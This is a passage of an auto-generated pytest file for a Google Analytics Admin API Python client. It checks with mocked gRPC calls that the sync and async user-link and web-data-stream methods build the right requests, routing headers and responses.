assert isinstance(response, analytics_admin.BatchUpdateUserLinksResponse) def test_batch_update_user_links_from_dict(): test_batch_update_user_links(request_type=dict) def test_batch_update_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: client.batch_update_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchUpdateUserLinksRequest() @pytest.mark.asyncio async def test_batch_update_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.BatchUpdateUserLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchUpdateUserLinksResponse() ) response = await client.batch_update_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchUpdateUserLinksRequest() # Establish that the response is the type that we expect. 
    assert isinstance(response, analytics_admin.BatchUpdateUserLinksResponse)


@pytest.mark.asyncio
async def test_batch_update_user_links_async_from_dict():
    await test_batch_update_user_links_async(request_type=dict)


def test_batch_update_user_links_field_headers():
    """The request's `parent` must be echoed as an x-goog-request-params header."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchUpdateUserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_update_user_links), "__call__"
    ) as call:
        call.return_value = analytics_admin.BatchUpdateUserLinksResponse()
        client.batch_update_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_batch_update_user_links_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchUpdateUserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_update_user_links), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.BatchUpdateUserLinksResponse()
        )
        await client.batch_update_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_delete_user_link(
    transport: str = "grpc", request_type=analytics_admin.DeleteUserLinkRequest
):
    """delete_user_link forwards the request; a successful delete returns None."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.delete_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteUserLinkRequest()

    # Establish that the response is the type that we expect.
    assert response is None


def test_delete_user_link_from_dict():
    test_delete_user_link(request_type=dict)


def test_delete_user_link_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call:
        client.delete_user_link()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteUserLinkRequest()


@pytest.mark.asyncio
async def test_delete_user_link_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteUserLinkRequest
):
    """Async variant: delete_user_link awaits the fake call and returns None."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteUserLinkRequest()

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_delete_user_link_async_from_dict():
    await test_delete_user_link_async(request_type=dict)


def test_delete_user_link_field_headers():
    """The request's `name` must be echoed as an x-goog-request-params header."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteUserLinkRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call:
        call.return_value = None
        client.delete_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_delete_user_link_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteUserLinkRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_delete_user_link_flattened():
    """Flattened `name=` keyword is folded into the request object."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.delete_user_link(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_user_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_user_link( analytics_admin.DeleteUserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_user_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_user_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.delete_user_link( analytics_admin.DeleteUserLinkRequest(), name="name_value", ) def test_batch_delete_user_links( transport: str = "grpc", request_type=analytics_admin.BatchDeleteUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_delete_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.batch_delete_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchDeleteUserLinksRequest() # Establish that the response is the type that we expect. assert response is None def test_batch_delete_user_links_from_dict(): test_batch_delete_user_links(request_type=dict) def test_batch_delete_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
    with mock.patch.object(
        type(client.transport.batch_delete_user_links), "__call__"
    ) as call:
        client.batch_delete_user_links()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.BatchDeleteUserLinksRequest()


@pytest.mark.asyncio
async def test_batch_delete_user_links_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.BatchDeleteUserLinksRequest,
):
    """Async variant: batch_delete_user_links awaits the fake call and returns None."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_delete_user_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.batch_delete_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.BatchDeleteUserLinksRequest()

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_batch_delete_user_links_async_from_dict():
    await test_batch_delete_user_links_async(request_type=dict)


def test_batch_delete_user_links_field_headers():
    """The request's `parent` must be echoed as an x-goog-request-params header."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchDeleteUserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_delete_user_links), "__call__"
    ) as call:
        call.return_value = None
        client.batch_delete_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_batch_delete_user_links_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchDeleteUserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_delete_user_links), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.batch_delete_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_get_web_data_stream(
    transport: str = "grpc", request_type=analytics_admin.GetWebDataStreamRequest
):
    """get_web_data_stream forwards the request and surfaces the mocked WebDataStream."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_web_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.WebDataStream(
            name="name_value",
            measurement_id="measurement_id_value",
            firebase_app_id="firebase_app_id_value",
            default_uri="default_uri_value",
            display_name="display_name_value",
        )
        response = client.get_web_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetWebDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.WebDataStream)
    assert response.name == "name_value"
    assert response.measurement_id == "measurement_id_value"
    assert response.firebase_app_id == "firebase_app_id_value"
    assert response.default_uri == "default_uri_value"
    assert response.display_name == "display_name_value"


def test_get_web_data_stream_from_dict():
    test_get_web_data_stream(request_type=dict)


def test_get_web_data_stream_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_web_data_stream), "__call__"
    ) as call:
        client.get_web_data_stream()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetWebDataStreamRequest()


@pytest.mark.asyncio
async def test_get_web_data_stream_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.GetWebDataStreamRequest,
):
    """Async variant: get_web_data_stream awaits the fake call and returns the stream."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_web_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.WebDataStream(
                name="name_value",
                measurement_id="measurement_id_value",
                firebase_app_id="firebase_app_id_value",
                default_uri="default_uri_value",
                display_name="display_name_value",
            )
        )
        response = await client.get_web_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetWebDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.WebDataStream)
    assert response.name == "name_value"
    assert response.measurement_id == "measurement_id_value"
    assert response.firebase_app_id == "firebase_app_id_value"
    assert response.default_uri == "default_uri_value"
    assert response.display_name == "display_name_value"


@pytest.mark.asyncio
async def test_get_web_data_stream_async_from_dict():
    await test_get_web_data_stream_async(request_type=dict)


def test_get_web_data_stream_field_headers():
    """The request's `name` must be echoed as an x-goog-request-params header."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetWebDataStreamRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_web_data_stream), "__call__"
    ) as call:
        call.return_value = resources.WebDataStream()
        client.get_web_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_web_data_stream_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetWebDataStreamRequest()

    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_web_data_stream), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.WebDataStream()
        )
        await client.get_web_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_web_data_stream_flattened():
    """Flattened `name=` keyword is folded into the request object."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_web_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.WebDataStream()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_web_data_stream(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_get_web_data_stream_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_web_data_stream(
            analytics_admin.GetWebDataStreamRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_get_web_data_stream_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_web_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
call.return_value = resources.WebDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_web_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_web_data_stream( analytics_admin.GetWebDataStreamRequest(), name="name_value", ) def test_delete_web_data_stream( transport: str = "grpc", request_type=analytics_admin.DeleteWebDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteWebDataStreamRequest() # Establish that the response is the type that we expect. 
assert response is None def test_delete_web_data_stream_from_dict(): test_delete_web_data_stream(request_type=dict) def test_delete_web_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: client.delete_web_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteWebDataStreamRequest() @pytest.mark.asyncio async def test_delete_web_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteWebDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteWebDataStreamRequest() # Establish that the response is the type that we expect. 
assert response is None @pytest.mark.asyncio async def test_delete_web_data_stream_async_from_dict(): await test_delete_web_data_stream_async(request_type=dict) def test_delete_web_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteWebDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: call.return_value = None client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_web_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteWebDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_web_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_web_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_web_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_web_data_stream( analytics_admin.DeleteWebDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_web_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_web_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_web_data_stream( analytics_admin.DeleteWebDataStreamRequest(), name="name_value", ) def test_update_web_data_stream( transport: str = "grpc", request_type=analytics_admin.UpdateWebDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) response = client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateWebDataStreamRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" def test_update_web_data_stream_from_dict(): test_update_web_data_stream(request_type=dict) def test_update_web_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: client.update_web_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateWebDataStreamRequest() @pytest.mark.asyncio async def test_update_web_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateWebDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) ) response = await client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_update_web_data_stream_async_from_dict(): await test_update_web_data_stream_async(request_type=dict) def test_update_web_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateWebDataStreamRequest() request.web_data_stream.name = "web_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: call.return_value = resources.WebDataStream() client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "web_data_stream.name=web_data_stream.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_web_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateWebDataStreamRequest() request.web_data_stream.name = "web_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) await client.update_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "web_data_stream.name=web_data_stream.name/value", ) in kw["metadata"] def test_update_web_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_web_data_stream( web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. 
